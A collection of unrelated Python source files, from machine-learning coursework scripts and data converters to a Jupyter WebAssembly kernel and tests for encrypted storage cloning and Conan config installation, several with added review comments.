    [0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,0,8,8,8,8,8,8,0,0,0,0,0,0,0,0]])
env = RaceTrack(course)
player = Agent(env)
# with open('racetrack/player.pickle', 'rb') as f:
#     pickle.load(f)
player.train(1000)
player.play(4, True)
# Persist the trained agent. NOTE(review): `pickle` is used here but no
# import is visible in this chunk -- verify it is imported at file top.
with open('racetrack/player.pickle', 'wb') as f:
    pickle.dump(player, f)
|
import shelve

# Use the Shelf as a context manager so the underlying dbm file is
# flushed and closed; the original left the handle open for the whole
# process lifetime (a resource leak and a risk of unsynced data).
with shelve.open('../Scripts/emails') as email_db:
    arr = ['gstaines1@usnews.com', 'Gustave']
    print(email_db['Gustave'], arr[0])
#created and edited by Samuel Phillips
#imports for data, classes and more
import pandas as pd
import numpy as np
from sklearn.datasets import load_iris
from sklearn import tree, metrics
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
from sklearn.neighbors import KNeighborsClassifier
#decided to use classifiers on the fitbit data with topics from assignment 2
#as I think comparing two topics and then using the k nearest neighbor classifier
#is a good way to compare two similar topics
#also wanted to do a scatterplot to show attributes of the fitbit data
#fitbit data is loaded
#used daily steps taken and daily calories burned from the series
#of different fitbit csv files
# NOTE(review): the two CSVs are assumed to align row-for-row (same user,
# same day at each index) -- confirm; a merge on Id/date would be safer.
data = pd.read_csv('Fitabase_Data/dailySteps_merged.csv')
d1 = data.loc[:,'StepTotal']
d1 = d1.values
data = pd.read_csv('Fitabase_Data/dailyCalories_merged.csv')
d2 = data.loc[:,'Calories']
d2 = d2.values
#X value for train test split is found
#each sample is the pair [steps, calories] for one day
X = []
for i in range(0, len(d1)):
    X.append([d1[i], d2[i]])
#y value for the train test split is found
#the class label is the user Id, so this is per-user classification
ids = data.loc[:, 'Id']
y = ids.values
#train test split with k nearest neighbors is used in this example
#no random_state is set, so results vary between runs
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
n = KNeighborsClassifier()
n.fit(X_train, y_train)
p1 = n.predict(X_test)
X_test = np.array(X_test)
#figure is created and first point is
#plotted separately only so it carries the legend label
plt.figure(figsize=(15,15))
#plot is supplied with all the correlated points between calories and steps in a day
plt.scatter(X[0][0], X[0][1], facecolors='none', edgecolors='black', label='Steps x Calories')
for i in range(1, len(y)):
    plt.scatter(X[i][0], X[i][1], facecolors='none', edgecolors='black')
#incorrect and correct lists are stated
corrX, corrY = [], []
incorX, incorY = [], []
#for loop that finds all the incorrect and correct points from
#the k nearest neighbor train test split
for i in range(0, len(p1)):
    if p1[i] == y_test[i]:
        corrX.append(X_test[:, :1][i])
        corrY.append(X_test[:, 1:][i])
    elif p1[i] != y_test[i]:
        incorX.append(X_test[:, :1][i])
        incorY.append(X_test[:, 1:][i])
#first points of the correct and incorrect predictions are plotted
#separately so each series gets exactly one legend entry
plt.scatter(corrX[0], corrY[0], color='cyan', marker=(5, 1), label='correct prediction')
plt.scatter(incorX[0], incorY[0], color='hotpink', marker=(5, 1), label='incorrect prediction')
#two for loops that plot the incorrect and correct prediction points
for i in range(0, len(corrX)):
    plt.scatter(corrX[i], corrY[i], color='cyan', marker=(5, 1))
for i in range(0, len(incorX)):
    plt.scatter(incorX[i], incorY[i], color='hotpink', marker=(5, 1))
#plot is given attributes to help with analysis
plt.legend()
plt.xlabel('Steps Taken in a Day')
plt.ylabel('Calories Burned in a Day')
plt.title('Comparing Calories Burned in a Day with Steps taken in a Day')
#error rate is found and set
#(fraction of misclassified test samples, as a percentage)
err = (len(incorX))/(len(incorX)+len(corrX))
err = err*100
#interesting takeaways from this assignment printed out
print('Interesting facts/ takeaways:')
print(' - There is a strong positive correlation between calories burned in a day and steps taken in a day')
print(' - Correct Predictions: ' + str(len(corrX)))
print(' - Incorrect Predictions: ' + str(len(incorX)))
print(' - Error Rate Percentage in the test sample: ' + str(err) + '%')
print(' - Major Takeaway from this Assignment: K nearest neighbor has a high error rate with high population counts')
print(' - Maybe this could be a good example of why k nearest neighbor classifier works best with smaller population sizes')
#finally the scatter plot is saved as a pdf file
plt.savefig('a6_scatter.pdf')
'''
use xmltodict library to export json file from xml file
'''
import json

import xmltodict

# Read the XML in text mode and parse it into an OrderedDict-like tree.
with open("books.xml", "r", encoding="utf-8") as infile:
    parsed = xmltodict.parse(infile.read())

# BUG FIX: the output file was opened in binary mode ('wb'), but
# json.dump() writes str objects, which raises TypeError on a binary
# handle. Open in text mode instead, and use context managers so both
# files are closed even on error.
with open("books.json", "w", encoding="utf-8") as outfile:
    json.dump(parsed, outfile, indent=2)
%cd /content/keras-YOLOv3-model-set
# NOTE: the line above is an IPython/Colab magic -- this cell only runs
# inside a notebook, not as a plain Python script.
import os
import glob
# Class names; a box's class id is its index in this list.
CLASS_NAMES = [ "cat", "dog" ]
# TAGET_FOLDER_NAME = "labels"
TAGET_FOLDER_NAME = "dogs_cats_yolo_labeled"
# Collect every Pascal-VOC XML annotation file in the target folder.
label_file_names = []
for file_name in glob.glob(TAGET_FOLDER_NAME+'/*.xml'):
    label_file_names.append(file_name)
print(len(label_file_names))
print(label_file_names)
import xml.etree.ElementTree as ET
# Convert each VOC XML into one record:
#   [image_path, "xmin,ymin,xmax,ymax,cls_id", ...]
all_record = []
for file_name in label_file_names:
    with open(file_name) as in_file:
        tree = ET.parse(in_file)
        root = tree.getroot()
        # NOTE(review): str.replace swaps EVERY "xml" substring, so a
        # path containing "xml" elsewhere would be mangled -- confirm
        # paths, or prefer replacing only the ".xml" suffix.
        a_record = [ file_name.replace("xml", "jpg") ]
        for obj in root.iter('object'):
            difficult = obj.find('difficult').text
            cls = obj.find('name').text
            # Skip unknown classes and boxes flagged "difficult".
            if cls not in CLASS_NAMES or int(difficult)==1:
                continue
            cls_id = str(CLASS_NAMES.index(cls))
            xmlbox = obj.find('bndbox')
            xmin = xmlbox.find('xmin').text
            ymin = xmlbox.find('ymin').text
            xmax = xmlbox.find('xmax').text
            ymax = xmlbox.find('ymax').text
            a_record.append(",".join([xmin,ymin,xmax,ymax,cls_id]))
        all_record.append(a_record)
# Emit one space-separated line per image (YOLO training list format).
with open("labels.txt", "w") as f:
    for a_record in all_record:
        print(a_record)
        f.write(" ".join([str(i) for i in a_record]))
        f.write("\n")
print("labels.txt created.")
|
from . import __version__
from .defs import (
ENV_LOG_FILE,
ENV_LOG_LEVEL,
ENV_WASM_INTERPRETER,
LESS_THAN_OCAML_MAX_INT,
KERNEL_IMPLEMENTATION_NAME,
KERNEL_NAME,
)
from ipykernel.kernelbase import Kernel # type: ignore
import os
import logging
import pexpect # type: ignore
from .wasm_replwrap import WasmREPLWrapper
import shutil
import re
import signal
from subprocess import check_output
import sys
import traceback
from typing import Dict, Any
# Extracts the interpreter version number from its banner, e.g. "wasm 1.0".
version_pat = re.compile(r"wasm (\d+(\.\d+)+)")
error_pat = re.compile(
    r"stdin:(\d+.\d+-\d+.\d+): (.+?): (.+)"
)  # 1=location, 2=type, 3=details
# Logging is configured from the environment: level (default WARNING)
# and an optional log file destination.
log_level = int(os.environ.get(ENV_LOG_LEVEL, str(logging.WARNING)))
log_params: Dict[str, Any] = {"level": log_level}
log_path = os.environ.get(ENV_LOG_FILE)
if log_path is not None:
    log_params["filename"] = log_path
logging.basicConfig(**log_params)
logger = logging.getLogger(__name__)
class WasmKernel(Kernel):
    """Jupyter kernel that proxies code cells to a WebAssembly reference
    interpreter subprocess driven through pexpect.

    The interpreter binary is located via $PATH (name overridable through
    the ENV_WASM_INTERPRETER environment variable) and restarted whenever
    it dies, is interrupted, or raises an unexpected error.
    """
    def __init__(self, **kwargs):
        Kernel.__init__(self, **kwargs)
        # Resolve the interpreter executable once, up front, so a missing
        # binary fails fast at kernel startup rather than at first execute.
        env_interpreter = os.environ.get(ENV_WASM_INTERPRETER, "wasm")
        self._interpreter_path = shutil.which(env_interpreter)
        if self._interpreter_path is None:
            raise Exception(
                "Unable to find a `%s` executable in $PATH: %s"
                % (env_interpreter, os.environ.get("PATH"))
            )
        self._start_wasm()
    # Kernel metadata / default attribute values.
    implementation = KERNEL_IMPLEMENTATION_NAME
    implementation_version = __version__
    _banner = None            # lazily-fetched interpreter banner text
    _interpreter_path = None  # absolute path to the wasm binary
    child = None              # pexpect.spawn handle of the live interpreter
    @property
    def banner(self):
        # Lazily capture the interpreter's own startup banner by running
        # it once with an empty program.
        if self._banner is None:
            self._banner = check_output(
                [self._interpreter_path, "-v", "-e", ""]
            ).decode("utf-8")
        return self._banner
    @property
    def language_version(self):
        # Parse the version number out of the banner, e.g. "1.0".
        m = version_pat.search(self.banner)
        return m.group(1)
    language_info = {
        "name": KERNEL_NAME,
        "codemirror_mode": "commonlisp",
        "mimetype": "text/x-common-lisp",
        "file_extension": ".wat",
    }
    def _start_wasm(self, kill_existing=False):
        """(Re)spawn the wasm interpreter subprocess and its REPL wrapper."""
        # NOTE(review): `+` binds tighter than the conditional expression,
        # so when self.child is falsy this logs "" instead of the base
        # message -- the whole concatenation is the ternary's true arm.
        logger.debug(
            "starting new wasm process" + ", 1 wasm process already exists"
            if self.child
            else ""
        )
        if kill_existing and self.child is not None:
            logger.debug("killing existing wasm process")
            try:
                self.child.terminate(force=True)
            except Exception:
                # Best-effort cleanup: a dead/zombie child must not block
                # spawning the replacement interpreter.
                logger.debug(
                    "encountered an error while killing existing wasm process",
                    exc_info=True,
                )
        # Signal handlers are inherited by forked processes, and we can't easily
        # reset it from the subprocess. Since kernelapp ignores SIGINT except in
        # message handlers, we need to temporarily reset the SIGINT handler here
        # so that wasm is interruptible.
        sig = signal.signal(signal.SIGINT, signal.SIG_DFL)
        try:
            logger.info("using wasm interpreter at `%s`" % self._interpreter_path)
            # Use `-w 10000` to increase output width from 80 to something much larger so that
            # text wrapping is handled by the jupyter frontend instead of the wasm interpreter
            self.child = pexpect.spawn(
                self._interpreter_path,
                ["-w", LESS_THAN_OCAML_MAX_INT],
                echo=False,
                encoding="utf-8",
                codec_errors="replace",
            )
            self.wasmwrapper = WasmREPLWrapper(self.child)
        finally:
            signal.signal(signal.SIGINT, sig)
        # NOTE: use the following line to run any prep operation on the Wasm interpreter
        # self.wasmwrapper.run_command(image_setup_cmd)
    def do_execute(
        self, code, silent, store_history=True, user_expressions=None, allow_stdin=False
    ):
        """Run one cell in the interpreter and translate the outcome into a
        Jupyter execute_reply (ok / error / abort), restarting the
        interpreter on EOF, interrupt, or unknown failure."""
        logger.debug("do_execute received: ```%s```", code)
        code = code.rstrip()
        logger.debug("do_execute will run: ```%s```", code)
        self.silent = silent
        # Empty cell: trivially succeed without touching the subprocess.
        if not code:
            return {
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }
        try:
            output = self.wasmwrapper.run_command(code, timeout=None)
            logger.debug("response from run_command: ```%s```" % output)
        except pexpect.EOF:
            # Interpreter died: salvage whatever it printed and restart.
            logger.debug("pexpect.EOF raised during run_command")
            output = self.wasmwrapper.child.before + "Restarting Wasm"
            self._start_wasm()
        except KeyboardInterrupt:
            logger.debug("KeyboardInterrupt raised during run_command")
            # TODO if the wasm interpreter ever support SIGINT or some other interrupt mechanism,
            # use that instead so that the entire interpreter's state doesn't have to be thrown
            # out when a single execution is aborted.
            self.send_response(
                self.iopub_socket,
                "error",
                {
                    "ename": "interrupt",
                    "evalue": "",
                    "traceback": ["Restarting Wasm because execution was aborted"],
                },
            )
            self._start_wasm(kill_existing=True)
            return {"status": "abort", "execution_count": self.execution_count}
        except Exception:
            # Anything unexpected: report a traceback to the frontend and
            # restart the interpreter with a clean slate.
            logger.exception("unknown error raised during run_command", exc_info=True)
            exc_type, exc_value, exc_traceback = sys.exc_info()
            error_content = {
                "ename": "unknown",
                "evalue": "",
                "traceback": [
                    "Restarting Wasm due to unknown error: " + repr(exc_value) + "\n\n"
                ]
                + traceback.format_tb(exc_traceback),
            }
            self.send_response(self.iopub_socket, "error", error_content)
            self._start_wasm(kill_existing=True)
            error_content["execution_count"] = self.execution_count
            error_content["status"] = "error"
            return error_content
        # The interpreter reports errors inline on stdout; detect them by
        # pattern so they surface as Jupyter errors, not plain output.
        wasm_error = error_pat.search(output)
        if wasm_error:
            location, errtype, details = wasm_error.groups()
            error_content = {"ename": errtype, "evalue": details, "traceback": [output]}
            self.send_response(self.iopub_socket, "error", error_content)
            error_content["execution_count"] = self.execution_count
            error_content["status"] = "error"
            return error_content
        else:
            if not self.silent:
                self.send_response(
                    self.iopub_socket, "stream", {"name": "stdout", "text": output}
                )
            return {
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }
    # TODO def is_complete_request by using `wasm -d` which just runs validation
    # TODO def do_complete(self, code, cursor_pos):
    #   https://github.com/wasmerio/vscode-wasm/blob/master/syntaxes/wat.json
    #   https://code.visualstudio.com/api/language-extensions/language-configuration-guide
|
#!/usr/bin/python
# Given two numbers x and y, return the sum of x and y.
# number, number --> number
# Example:
# add(1,2) = 3
# add(0,2) = 2
def add(x, y):
    """Return the sum of the two given numbers.

    Examples: add(1, 2) == 3; add(0, 2) == 2.
    """
    total = x + y
    return total
# Given two numbers x and y, return the product of x and y.
# number, number --> number
# Example:
# multiply(1,2) = 2
# multiply(4,2) = 8
# multiply(4,0) = 0
def multiply(x, y):
    """Return the product of the two given numbers.

    Examples: multiply(4, 2) == 8; multiply(4, 0) == 0.
    """
    product = x * y
    return product
def showUI():
    """Interactively read an operation choice and two integers, then print
    the sum or product.

    Fixes over the original: the file mixed Python 2 `print` statements
    with Python 3 style calls (a SyntaxError under Python 3), compared the
    string returned by input() against the ints 1/2 (never equal in
    Python 3), and under Python 2 `input()` eval'd arbitrary user input.
    Now all input is read as text and converted explicitly.
    """
    operation = input("Choose your operation (1 - add; 2 - multiply): ").strip()
    print("Input the two numbers")
    x = int(input("x = "))
    y = int(input("y = "))
    if operation == "1":
        print("sum = " + str(add(x, y)))
    elif operation == "2":
        print("product = " + str(multiply(x, y)))
# Only launch the interactive prompt when run as a script, not on import.
if __name__ == "__main__":
    showUI()
|
import logging
import pytest
from ocs_ci.ocs import constants
from ocs_ci.framework.testlib import (
skipif_ocs_version,
ManageTest,
tier1,
skipif_ocp_version,
kms_config_required,
skipif_managed_service,
skipif_disconnected_cluster,
skipif_proxy_cluster,
config,
)
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.resources import pod
from ocs_ci.helpers import helpers
from ocs_ci.ocs.exceptions import (
KMSResourceCleaneupError,
ResourceNotFoundError,
)
from ocs_ci.utility import kms
from semantic_version import Version
log = logging.getLogger(__name__)
# Set the arg values based on KMS provider.
# HPCS only supports KV engine v1; Vault is exercised with both v1 and v2,
# and additionally with/without a Vault namespace depending on whether the
# deployment is HCP-hosted. Polarion IDs tag each combination for reporting.
if config.ENV_DATA["KMS_PROVIDER"].lower() == constants.HPCS_KMS_PROVIDER:
    kmsprovider = constants.HPCS_KMS_PROVIDER
    argnames = ["kv_version", "kms_provider"]
    argvalues = [
        pytest.param("v1", kmsprovider),
    ]
else:
    kmsprovider = constants.VAULT_KMS_PROVIDER
    argnames = ["kv_version", "kms_provider", "use_vault_namespace"]
    if config.ENV_DATA.get("vault_hcp"):
        # HCP-managed Vault: tests run inside a Vault namespace.
        argvalues = [
            pytest.param(
                "v1", kmsprovider, True, marks=pytest.mark.polarion_id("OCS-3971")
            ),
            pytest.param(
                "v2", kmsprovider, True, marks=pytest.mark.polarion_id("OCS-3972")
            ),
        ]
    else:
        argvalues = [
            pytest.param(
                "v1", kmsprovider, False, marks=pytest.mark.polarion_id("OCS-2650")
            ),
            pytest.param(
                "v2", kmsprovider, False, marks=pytest.mark.polarion_id("OCS-2651")
            ),
        ]
@tier1
@skipif_ocs_version("<4.8")
@skipif_ocp_version("<4.8")
@kms_config_required
@skipif_managed_service
@skipif_disconnected_cluster
@skipif_proxy_cluster
@pytest.mark.parametrize(
    argnames=argnames,
    argvalues=argvalues,
)
class TestEncryptedRbdClone(ManageTest):
    """
    Tests to verify PVC to PVC clone feature for encrypted RBD Block VolumeMode PVCs
    """

    @pytest.fixture(autouse=True)
    def setup(
        self,
        kv_version,
        kms_provider,
        use_vault_namespace,
        pv_encryption_kms_setup_factory,
        project_factory,
        multi_pvc_factory,
        pod_factory,
        storageclass_factory,
    ):
        """
        Setup csi-kms-connection-details configmap and create resources for the test

        Creates: a project, an encryption-enabled RBD storageclass, one RWX
        and one RWO Block-mode PVC with attached pods, and (for Vault) the
        tenant csi-kms token. Also verifies an encryption key exists in the
        KMS for each PVC's volume handle before any test runs.
        """
        log.info("Setting up csi-kms-connection-details configmap")
        self.kms = pv_encryption_kms_setup_factory(kv_version, use_vault_namespace)
        log.info("csi-kms-connection-details setup successful")
        # Create a project
        self.proj_obj = project_factory()
        # Create an encryption enabled storageclass for RBD
        self.sc_obj = storageclass_factory(
            interface=constants.CEPHBLOCKPOOL,
            encrypted=True,
            encryption_kms_id=self.kms.kmsid,
        )
        if kms_provider == constants.VAULT_KMS_PROVIDER:
            # Create ceph-csi-kms-token in the tenant namespace
            self.kms.vault_path_token = self.kms.generate_vault_token()
            self.kms.create_vault_csi_kms_token(namespace=self.proj_obj.namespace)
        # Create PVC and Pods
        self.pvc_size = 1
        self.pvc_objs = multi_pvc_factory(
            interface=constants.CEPHBLOCKPOOL,
            project=self.proj_obj,
            storageclass=self.sc_obj,
            size=self.pvc_size,
            access_modes=[
                f"{constants.ACCESS_MODE_RWX}-Block",
                f"{constants.ACCESS_MODE_RWO}-Block",
            ],
            status=constants.STATUS_BOUND,
            num_of_pvc=2,
            wait_each=False,
        )
        self.pod_objs = helpers.create_pods(
            self.pvc_objs,
            pod_factory,
            constants.CEPHBLOCKPOOL,
            pods_for_rwx=1,
            status=constants.STATUS_RUNNING,
        )
        # Verify if the key is created in Vault
        self.vol_handles = []
        for pvc_obj in self.pvc_objs:
            pv_obj = pvc_obj.backed_pv_obj
            vol_handle = pv_obj.get().get("spec").get("csi").get("volumeHandle")
            self.vol_handles.append(vol_handle)
            if kms_provider == constants.VAULT_KMS_PROVIDER:
                if kms.is_key_present_in_path(
                    key=vol_handle, path=self.kms.vault_backend_path
                ):
                    log.info(f"Vault: Found key for {pvc_obj.name}")
                else:
                    raise ResourceNotFoundError(
                        f"Vault: Key not found for {pvc_obj.name}"
                    )

    def test_pvc_to_pvc_clone(self, kv_version, kms_provider, pod_factory):
        """
        Test to create a clone from an existing encrypted RBD PVC.
        Verify that the cloned PVC is encrypted and all the data is preserved.

        Flow: run IO and checksum the parent volumes, clone each PVC,
        attach pods to the clones, verify encryption keys and md5sums on
        the clones, run fresh IO, then tear everything down and (for
        Vault) verify the KMS keys were cleaned up.
        """
        log.info("Checking for encrypted device and running IO on all pods")
        for vol_handle, pod_obj in zip(self.vol_handles, self.pod_objs):
            # The volume handle appears in lsblk output with type "crypt"
            # only when the device is actually encrypted.
            if pod_obj.exec_sh_cmd_on_pod(
                command=f"lsblk | grep {vol_handle} | grep crypt"
            ):
                log.info(f"Encrypted device found in {pod_obj.name}")
            else:
                raise ResourceNotFoundError(
                    f"Encrypted device not found in {pod_obj.name}"
                )
            log.info(f"File created during IO {pod_obj.name}")
            pod_obj.run_io(
                storage_type="block",
                size="500M",
                io_direction="write",
                runtime=60,
                end_fsync=1,
                direct=1,
            )
        log.info("IO started on all pods")
        # Wait for IO completion
        for pod_obj in self.pod_objs:
            pod_obj.get_fio_results()
        log.info("IO completed on all pods")
        cloned_pvc_objs, cloned_vol_handles = ([] for i in range(2))
        # Calculate the md5sum value and create clones of exisiting PVCs
        log.info("Calculate the md5sum after IO and create clone of all PVCs")
        for pod_obj in self.pod_objs:
            pod_obj.md5sum_after_io = pod.cal_md5sum(
                pod_obj=pod_obj,
                file_name=pod_obj.get_storage_path(storage_type="block"),
                block=True,
            )
            cloned_pvc_obj = pvc.create_pvc_clone(
                self.sc_obj.name,
                pod_obj.pvc.name,
                constants.CSI_RBD_PVC_CLONE_YAML,
                self.proj_obj.namespace,
                volume_mode=constants.VOLUME_MODE_BLOCK,
                access_mode=pod_obj.pvc.access_mode,
            )
            helpers.wait_for_resource_state(cloned_pvc_obj, constants.STATUS_BOUND)
            cloned_pvc_obj.reload()
            # Carry the parent's checksum on the clone for later comparison.
            cloned_pvc_obj.md5sum = pod_obj.md5sum_after_io
            cloned_pvc_objs.append(cloned_pvc_obj)
        log.info("Clone of all PVCs created")
        # Create and attach pod to the pvc
        cloned_pod_objs = helpers.create_pods(
            cloned_pvc_objs,
            pod_factory,
            constants.CEPHBLOCKPOOL,
            pods_for_rwx=1,
            status="",
        )
        # Verify the new pods are running
        log.info("Verify the new pods are running")
        for pod_obj in cloned_pod_objs:
            helpers.wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)
            pod_obj.reload()
        log.info("Verified: New pods are running")
        # Verify encryption keys are created for cloned PVCs in Vault
        for pvc_obj in cloned_pvc_objs:
            pv_obj = pvc_obj.backed_pv_obj
            vol_handle = pv_obj.get().get("spec").get("csi").get("volumeHandle")
            cloned_vol_handles.append(vol_handle)
            if kms_provider == constants.VAULT_KMS_PROVIDER:
                if kms.is_key_present_in_path(
                    key=vol_handle, path=self.kms.vault_backend_path
                ):
                    log.info(f"Vault: Found key for restore PVC {pvc_obj.name}")
                else:
                    raise ResourceNotFoundError(
                        f"Vault: Key not found for restored PVC {pvc_obj.name}"
                    )
        # Verify encrypted device is present and md5sum on all pods
        for vol_handle, pod_obj in zip(cloned_vol_handles, cloned_pod_objs):
            if pod_obj.exec_sh_cmd_on_pod(
                command=f"lsblk | grep {vol_handle} | grep crypt"
            ):
                log.info(f"Encrypted device found in {pod_obj.name}")
            else:
                raise ResourceNotFoundError(
                    f"Encrypted device not found in {pod_obj.name}"
                )
            log.info(f"Verifying md5sum on pod {pod_obj.name}")
            pod.verify_data_integrity(
                pod_obj=pod_obj,
                file_name=pod_obj.get_storage_path(storage_type="block"),
                original_md5sum=pod_obj.pvc.md5sum,
                block=True,
            )
            log.info(f"Verified md5sum on pod {pod_obj.name}")
        # Run IO on new pods
        log.info("Starting IO on new pods")
        for pod_obj in cloned_pod_objs:
            pod_obj.run_io(storage_type="block", size="100M", runtime=10)
        # Wait for IO completion on new pods
        log.info("Waiting for IO completion on new pods")
        for pod_obj in cloned_pod_objs:
            pod_obj.get_fio_results()
        log.info("IO completed on new pods.")
        # Delete the restored pods, PVC and snapshots
        log.info("Deleting all pods")
        for pod_obj in cloned_pod_objs + self.pod_objs:
            pod_obj.delete()
            pod_obj.ocp.wait_for_delete(resource_name=pod_obj.name)
        log.info("Deleting all PVCs")
        for pvc_obj in cloned_pvc_objs + self.pvc_objs:
            pv_obj = pvc_obj.backed_pv_obj
            pvc_obj.delete()
            pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name)
        if kms_provider == constants.VAULT_KMS_PROVIDER:
            # Verify if the keys for parent and cloned PVCs are deleted from Vault
            # (key deletion on clone removal only works on KV v1, or from
            # ODF 4.9 onward for KV v2).
            if kv_version == "v1" or Version.coerce(
                config.ENV_DATA["ocs_version"]
            ) >= Version.coerce("4.9"):
                log.info(
                    "Verify whether the keys for cloned PVCs are deleted from vault"
                )
                for key in cloned_vol_handles + self.vol_handles:
                    if not kms.is_key_present_in_path(
                        key=key, path=self.kms.vault_backend_path
                    ):
                        log.info(f"Vault: Key deleted for {key}")
                    else:
                        raise KMSResourceCleaneupError(
                            f"Vault: Key deletion failed for {key}"
                        )
                log.info("All keys from vault were deleted")
|
import unittest
from conans.test.utils.tools import TestClient, TestBufferConanOutput
import os
import zipfile
from conans.test.utils.test_files import temp_folder
from conans.util.files import load, save_files, save
from conans.client.remote_registry import RemoteRegistry, Remote
from mock import patch
from conans.client.rest.uploader_downloader import Downloader
from conans import tools
from conans.client.conf import ConanClientConfigParser
import shutil
win_profile = """[settings]
os: Windows
"""
linux_profile = """[settings]
os: Linux
"""
remotes = """myrepo1 https://myrepourl.net False
my-repo-2 https://myrepo2.com True
"""
registry = """myrepo1 https://myrepourl.net False
Pkg/1.0@user/channel myrepo1
"""
settings_yml = """os:
Windows:
Linux:
arch: [x86, x86_64]
"""
conan_conf = """
[log]
run_to_output = False # environment CONAN_LOG_RUN_TO_OUTPUT
level = 10 # environment CONAN_LOGGING_LEVEL
[general]
compression_level = 6 # environment CONAN_COMPRESSION_LEVEL
cpu_count = 1 # environment CONAN_CPU_COUNT
[proxies]
# Empty section will try to use system proxies.
# If don't want proxy at all, remove section [proxies]
# As documented in http://docs.python-requests.org/en/latest/user/advanced/#proxies
http = http://user:pass@10.10.1.10:3128/
no_proxy = mylocalhost
https = None
# http = http://10.10.1.10:3128
# https = http://10.10.1.10:1080
"""
def zipdir(path, zipfilename):
    """Recursively archive every file under *path* into *zipfilename*,
    using DEFLATE compression. Entry names keep the on-disk paths
    (no arcname rewriting), matching what the install tests expect."""
    with zipfile.ZipFile(zipfilename, "w", zipfile.ZIP_DEFLATED) as archive:
        for dirpath, _dirnames, filenames in os.walk(path):
            for name in filenames:
                archive.write(os.path.join(dirpath, name))
class ConfigInstallTest(unittest.TestCase):
    """Tests for `conan config install` from a zip file, a URL and a git
    repo, checking that settings, remotes, profiles, conan.conf and extra
    files (pylintrc) land in the client cache.

    Note: the `*_test`-suffixed method names are the legacy conans test
    naming convention picked up by its nose-style runner.
    """

    def setUp(self):
        # Fresh client with a pre-populated registry and two profiles that
        # the installed config is expected to replace/merge.
        self.client = TestClient()
        registry_path = self.client.client_cache.registry
        save(registry_path, """my-repo-2 https://myrepo2.com True
conan-center https://conan-center.com

MyPkg/0.1@user/channel my-repo-2
Other/1.2@user/channel conan-center
""")
        save(os.path.join(self.client.client_cache.profiles_path, "default"), "#default profile empty")
        save(os.path.join(self.client.client_cache.profiles_path, "linux"), "#empty linux profile")

    def _create_profile_folder(self, folder=None):
        # Build an on-disk config layout (the thing users would zip up).
        folder = folder or temp_folder(path_with_spaces=False)
        save_files(folder, {"settings.yml": settings_yml,
                            "remotes.txt": remotes,
                            "profiles/linux": linux_profile,
                            "profiles/windows": win_profile,
                            "config/conan.conf": conan_conf,
                            "pylintrc": "#Custom pylint"})
        return folder

    def _create_zip(self, zippath=None):
        folder = self._create_profile_folder()
        zippath = zippath or os.path.join(folder, "myconfig.zip")
        zipdir(folder, zippath)
        return zippath

    def _check(self, install_path):
        """Assert every piece of the fixture config was installed and that
        general.config_install records *install_path* for reinstalls."""
        settings_path = self.client.client_cache.settings_path
        self.assertEqual(load(settings_path).splitlines(), settings_yml.splitlines())
        registry_path = self.client.client_cache.registry
        # Local `registry` deliberately shadows the module-level fixture
        # string of the same name; same for `conan_conf` below.
        registry = RemoteRegistry(registry_path, TestBufferConanOutput())
        self.assertEqual(registry.remotes,
                         [Remote("myrepo1", "https://myrepourl.net", False),
                          Remote("my-repo-2", "https://myrepo2.com", True),
                          ])
        self.assertEqual(registry.refs, {"MyPkg/0.1@user/channel": "my-repo-2"})
        self.assertEqual(sorted(os.listdir(self.client.client_cache.profiles_path)),
                         sorted(["default", "linux", "windows"]))
        self.assertEqual(load(os.path.join(self.client.client_cache.profiles_path, "linux")).splitlines(),
                         linux_profile.splitlines())
        self.assertEqual(load(os.path.join(self.client.client_cache.profiles_path, "windows")).splitlines(),
                         win_profile.splitlines())
        conan_conf = ConanClientConfigParser(self.client.client_cache.conan_conf_path)
        self.assertEqual(conan_conf.get_item("log.run_to_output"), "False")
        self.assertEqual(conan_conf.get_item("log.run_to_file"), "False")
        self.assertEqual(conan_conf.get_item("log.level"), "10")
        self.assertEqual(conan_conf.get_item("general.compression_level"), "6")
        self.assertEqual(conan_conf.get_item("general.sysrequires_sudo"), "True")
        self.assertEqual(conan_conf.get_item("general.cpu_count"), "1")
        self.assertEqual(conan_conf.get_item("general.config_install"), install_path)
        self.assertEqual(conan_conf.get_item("proxies.no_proxy"), "mylocalhost")
        self.assertEqual(conan_conf.get_item("proxies.https"), "None")
        self.assertEqual(conan_conf.get_item("proxies.http"), "http://user:pass@10.10.1.10:3128/")
        self.assertEqual("#Custom pylint",
                         load(os.path.join(self.client.client_cache.conan_folder, "pylintrc")))

    def install_file_test(self):
        """ should install from a file in current dir
        """
        zippath = self._create_zip()
        self.client.run('config install "%s"' % zippath)
        self._check(zippath)
        # The source zip must be left in place, not consumed.
        self.assertTrue(os.path.exists(zippath))

    def test_without_profile_folder(self):
        # Installing must work even when the profiles folder is missing.
        shutil.rmtree(self.client.client_cache.profiles_path)
        zippath = self._create_zip()
        self.client.run('config install "%s"' % zippath)
        self.assertEqual(sorted(os.listdir(self.client.client_cache.profiles_path)),
                         sorted(["linux", "windows"]))
        self.assertEqual(load(os.path.join(self.client.client_cache.profiles_path, "linux")).splitlines(),
                         linux_profile.splitlines())

    def install_url_test(self):
        """ should install from a URL
        """
        # Patch the downloader so no real network access happens.
        def my_download(obj, url, filename, **kwargs):  # @UnusedVariable
            self._create_zip(filename)

        with patch.object(Downloader, 'download', new=my_download):
            self.client.run("config install http://myfakeurl.com/myconf.zip")
            self._check("http://myfakeurl.com/myconf.zip")

            # repeat the process to check
            self.client.run("config install http://myfakeurl.com/myconf.zip")
            self._check("http://myfakeurl.com/myconf.zip")

    def install_repo_test(self):
        """ should install from a git repo
        """
        folder = self._create_profile_folder()
        with tools.chdir(folder):
            self.client.runner('git init .')
            self.client.runner('git add .')
            self.client.runner('git config user.name myname')
            self.client.runner('git config user.email myname@mycompany.com')
            self.client.runner('git commit -m "mymsg"')

        self.client.run('config install "%s/.git"' % folder)
        self._check("%s/.git" % folder)

    def reinstall_test(self):
        """ should use configured URL in conan.conf
        """
        zippath = self._create_zip()
        self.client.run('config set general.config_install="%s"' % zippath)
        self.client.run("config install")
        self._check(zippath)

    def reinstall_error_test(self):
